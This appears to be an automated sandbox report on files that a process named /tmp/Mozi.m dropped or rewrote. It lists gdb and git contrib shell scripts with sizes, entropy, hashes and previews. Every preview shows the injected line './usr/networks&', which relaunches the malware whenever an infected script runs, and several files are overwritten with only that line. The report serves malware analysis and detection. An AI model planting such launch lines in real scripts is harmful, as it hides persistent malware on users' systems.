                                                                                                        Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                        /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):253
                                                                                                        Entropy (8bit):5.267626424494032
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1048
                                                                                                        Entropy (8bit):4.806462537404251
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                        /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:OS/2 REXX batch file, ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):21942
                                                                                                        Entropy (8bit):5.106661772210516
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                        /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4825
                                                                                                        Entropy (8bit):5.113528532566079
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                        /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11759
                                                                                                        Entropy (8bit):5.2205279036587235
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:9M6sMKXA+aN0VYXNXYdcYZRoT+7rdVAqmdOIhH+Cqd1WPnaetMkTri0i55rIIq4G:SMxpY6YZRoTeJHf4H+CqdPAM8+p86TvK
                                                                                                        MD5:1E0926F456D9D5C35DF266EF276212C6
                                                                                                        SHA1:4C741DD9AD5F798BDCE0F67172F2B790FFF1B6BD
                                                                                                        SHA-256:C1DA77F45A430BC683EF4C9DDAA2AFB3B8F3D6F75A6B0406C456DFF3B4637BBC
                                                                                                        SHA-512:30A51026697132EA1F83C1D5BCF796C17AB7EC418352FF268BD1461397F9A2280E5752FC673ACE99F606B6E136E0F2A85FFF2F0BF8D12AE0A35C8D95C5A7A478
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.}..usage() {..exec "$0" -h.}..eval "$(echo "$OPTIONS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..get_repo_base() {..(...cd "$(/bin/pwd)" &&...cd "$1" || cd "$1.git" &&...{....cd .git....pwd...}..) 2>/dev/null.}..if [ -n "$GIT_SSL_NO_VERIFY" -o \.."$(git config --bool http.sslVerify)" = false ]; then. curl_extra_args="-k".fi..http_fetch () {..# $1 = Remote, $2 = Local..curl -nsfL $curl_extra_args "$1" >"$2"..curl_exit_status=$?..case $curl_exit_status in..126|127) exit ;;..*). return $curl_exit_status ;;..esac.}..clone_dumb_http () {..# $1 - remote, $2 - local..cd "$2" &&..clone_tmp="$GIT_DIR/clone-tmp" &&..mkdir -p "$clone_tmp" || exit 1..if [ -n "$GIT_CURL_FTP_NO_EPSV" -o \..."$(git config --bool http.noEPSV)" = true ]; then...curl_extra_args="${curl_extra_args} --disable-epsv"..fi..http_fetch "$1/info/refs" "$clone_tmp/refs" ||...die "Cannot get remote repository information..Perhaps git-update-server-info needs to be run there?"..test "z$qu
                                                                                                        /usr/share/doc/git/contrib/examples/git-commit.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13843
                                                                                                        Entropy (8bit):5.402105827507175
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ohf3saLCKohntpFFLWt8CKHNFQCglPySY2rOsMi/URiCNW8msLDkV+HZqIgCu:ohf3ThWnnFFLWqCKtFz1SY2rOstURiCK
                                                                                                        MD5:801864707ABB06C3ACD5E9AA7EF0A231
                                                                                                        SHA1:1492CCEEA7F7892507958970BD7012850E3D8498
                                                                                                        SHA-256:C4945D20EEF27CDF5E23450FF797808F6F58C8973B9ED415B7E391B24D3D895C
                                                                                                        SHA-512:ABD01060290B46E9F538D6E9E88F4F9FDCDFECF7715DE0CB860CCF053899453BDC701F82AD16BA12DB3B688DAF9B0429D4FBC5F6EEB1F4621CF68BA8868D733A
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1.}..TMP_INDEX=.THIS_INDEX="${GIT_INDEX_FILE:-$GIT_DIR/index}".NEXT_INDEX="$GIT_DIR/next-index$$".rm -f "$NEXT_INDEX".save_index () {..cp -p "$THIS_INDEX" "$NEXT_INDEX".}..run_status () {..# If TMP_INDEX is defined, that means we are doing..# "--only" partial commit, and that index file is used..# to build the tree for the commit. Otherwise, if..# NEXT_INDEX exists, that is the index file used to..# make the commit. Otherwise we are using as-is commit..# so the regular index file is what we use to compare...if test '' != "$TMP_INDEX"..then...GIT_INDEX_FILE="$TMP_INDEX"...export GIT_INDEX_FILE..elif test -f "$NEXT_INDEX"..then...GIT_INDEX_FILE="$NEXT_INDEX"...export GIT_INDEX_FILE..fi...if test "$status_only" = "t" || test "$use_status_color" = "t"; then...color=..else...color=--nocolor..fi..git runstatus ${color} \...${verbose:+--verbose} \...${amend:+--amend} \...${untracked_files:+--untracked}.}..trap '..test -z "$TMP_INDEX" || {...test -f "$TMP_INDEX" && rm -
                                                                                                        /usr/share/doc/git/contrib/examples/git-fetch.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5954
                                                                                                        Entropy (8bit):5.053117199381536
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:qjiwPNH32mZrlw8DpKg1ol8p2vgW7Tle8yibXzcDUyUuf1s7pbEVALomiS7yDRNL:qjrPNH32mZrlw8Dz1ol8p2YW/le8yib0
                                                                                                        MD5:660949C6D769C055433FA32AD8CF7CB7
                                                                                                        SHA1:D32B9EB0B032620ABDD884C3F205135F48A5CCAA
                                                                                                        SHA-256:8D505E7404190C524B25A82E6D935752034AC993B74C2B704B93A8F69BA56FF5
                                                                                                        SHA-512:65C50E1465E3D47F5703D87D9B6EB54CE63670D94A47C4341F42FBAB3566A3EE27159C968D55ACE8A2B4F8E7AC0B3E30BBA3BC42E24FAA92BFA5DAFAEC8ECA94
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&... done` || exit..if test "$#" -gt 1..then...# remote URL plus explicit refspecs; we need to merge them....reflist="$reflist$LF$taglist"..else...# No explicit refspecs; fetch tags only....reflist=$taglist..fi.fi..fetch_all_at_once () {.. eval=$(echo "$1" | git fetch--tool parse-reflist "-"). eval "$eval".. ( : subshell because we muck with IFS. IFS=" .$LF". (..if test "$remote" = . ; then.. git show-ref $rref || echo failed "$remote"..elif test -f "$remote" ; then.. test -n "$shallow_depth" &&...die "shallow clone with bundle is not supported".. git bundle unbundle "$remote" $rref ||.. echo failed "$remote"..else...if.test -d "$remote" &&.....# The remote might be our alternate. With....# this optimization we will bypass fetch-pack....# altogether, which means we cannot be doing....# the shallow stuff at all.....test ! -f "$GIT_DIR/shallow" &&....test -z "$shallow_depth" &&.....# See if all of what we are going to fetch are....# connected to
                                                                                                        /usr/share/doc/git/contrib/examples/git-gc.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):4.0161977906092705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVMQyXJ/F3LQVOORgn:L/lPn
                                                                                                        MD5:3A0813DB0108F078C610EB236C574A2F
                                                                                                        SHA1:A7D47F14D8FD35FD8BF6799063B3EB4E9DCC610A
                                                                                                        SHA-256:36BC6583258DCBB387D7AFFE086BC744F13B329E55E2F9657C385F6BC24AF215
                                                                                                        SHA-512:69C3A007D44A13ED9D3F9F4F5C545C9B3A541FE500DDFA2E2934706CB1A740AD61AC75F8F47572DA78F4CD49D65DAEAF6118B4E3FA0C8A182F8FA78FC52C7F82
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.git rerere gc || exit../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-log.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):234
                                                                                                        Entropy (8bit):4.9965164312586925
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:MebhIYlCNdR39BOAvvmmJ9aKI9tIYl0R39BOFon:MKhyN46vBFeQN4yn
                                                                                                        MD5:0A7B48976D929CEFAB720CC9C3F6EECF
                                                                                                        SHA1:EF27B3E70278C3563C0BDD27DD6836D902DC1A5F
                                                                                                        SHA-256:1A6D192431FBD9F6E4701981F8E954FD19B2D0265F594FE4EF2F1B82CE2CA78D
                                                                                                        SHA-512:A5AE18EFBE0ED252032E372ACD45229CE6FC5D40D83C89291CA560997F7AD557D9CBE00C684DE2877B6CCC3C505A2089A9FEA372B3A5CA1B06FF2DA0553C5B4D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.revs=$(git-rev-parse --revs-only --no-flags --default HEAD "$@") || exit.[ "$revs" ] || {..die "No HEAD ref".}.git-rev-list --pretty $(git-rev-parse --default HEAD "$@") |.LESS=-S ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-ls-remote.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2436
                                                                                                        Entropy (8bit):5.153713997451705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:9zJ+UQnIYLiLPX0zZhf1VpVZVpvPWg7WSfszrr9nQ8uMhpV24:Rp8Q09h9fDfh7f0zrr9Jv
                                                                                                        MD5:AF55A4CB380CF0ECC6B02D4B7E057F05
                                                                                                        SHA1:0B94808900C3D78664D23049C7A002292DF682DB
                                                                                                        SHA-256:9CCAED1BB101426884242DF53C0CA66E5BF7CC181E56817A9E07190268ECE44D
                                                                                                        SHA-512:5E193F8738198024CCCA155F4D141AA519A12AEA9FF4592D1A419B0EBAA1F30D4BCF297F0DDEA56281EEAE2CAD02ACFD6DC2CA6192465ABBCD2EB813909B911A
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1;.}..die () {. echo >&2 "$*". exit 1.}..exec=.while test $# != 0.do. case "$1" in. -h|--h|--he|--hea|--head|--heads). heads=heads; shift ;;. -t|--t|--ta|--tag|--tags). tags=tags; shift ;;. -u|--u|--up|--upl|--uploa|--upload|--upload-|--upload-p|--upload-pa|\. --upload-pac|--upload-pack)..shift..exec="--upload-pack=$1"..shift;;. -u=*|--u=*|--up=*|--upl=*|--uplo=*|--uploa=*|--upload=*|\. --upload-=*|--upload-p=*|--upload-pa=*|--upload-pac=*|--upload-pack=*)..exec=--upload-pack=$(expr "z$1" : 'z-[^=]*=\(.*\)')..shift;;. --). shift; break ;;. -*). usage ;;. *). break ;;. esac.done..case "$#" in 0) usage ;; esac..case ",$heads,$tags," in.,,,) heads=heads tags=tags other=other ;;.esac... git-parse-remote.peek_repo="$(get_remote_url "$@")".shift..tmp=.ls-remote-$$.trap "rm -fr $tmp-*" 0 1 2 3 15.tmpdir=$tmp-d..case "$peek_repo" in.http://* | https://* | ftp://* )..if [ -n "$GIT_SSL_NO_VERIFY" -o \..."$(git config --bool http.sslVerify)" = false
                                                                                                        /usr/share/doc/git/contrib/examples/git-merge-ours.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):247
                                                                                                        Entropy (8bit):4.532049748049262
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                        MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                        SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                        SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                        SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12742
                                                                                                        Entropy (8bit):5.053935136942481
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                        MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                        SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                        SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                        SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                        /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4349
                                                                                                        Entropy (8bit):4.9994650554848405
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:lB+CYcJmdl/TcE+v9+AggZXlRmfOQIJsbgSlz8LghIjMbefNB++c5xvANzm4GrH:XnYcQ9Anv0gXlRmy0leosTqxvANi4GrH
                                                                                                        MD5:B39052D7DD650B5F80BCEF97A6F7058C
                                                                                                        SHA1:EF47310F65C7239C67AFE91B0F76E78DC90D9AE8
                                                                                                        SHA-256:46146F3FC719B41C9D31F192AA0611E3975884C720786394AD745B13227FCE74
                                                                                                        SHA-512:46C39598206F81581740AB41E66B406FA7131511988713B38589069D1AB07F422189B1CA3999828E850ECAF345E93F6513947E44146334231E46DCCBF81D281F
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                        /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2499
                                                                                                        Entropy (8bit):5.168731776130111
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:gk8qWttthEvMBOv3h1Guyv97zFidlMli854KKOFjYIQM7C:gftttU0OP5Ezg4KO6IHu
                                                                                                        MD5:6F9B4B96D854B71A3ABE079E040047D6
                                                                                                        SHA1:C7AD001A3705F0E5004BA1B0F8DC4FFD995489D6
                                                                                                        SHA-256:AC617B99EA453E02C13EEDFFC136E484E9AEE3ADAE6E4EE0D8BA6F2BB2E9E57A
                                                                                                        SHA-512:5C229085CC34D3CFF2E0DDBE1C312DBDEE3D950D5B14E0B80408D849BE12DA39051E7136FC7D4C9F1E2135C0C4EB37CB2D507BC0DAB4FCB20FD6B0568C0CF15A
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                        /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1947
                                                                                                        Entropy (8bit):5.193786239756587
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                        /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2433
                                                                                                        Entropy (8bit):5.07831529192731
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                        /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4385
                                                                                                        Entropy (8bit):5.300590299626365
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                        /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1972
                                                                                                        Entropy (8bit):5.222096129300364
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
